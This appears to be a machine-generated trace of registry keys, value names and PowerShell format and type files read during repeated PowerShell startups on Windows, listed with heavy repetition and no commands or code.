WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
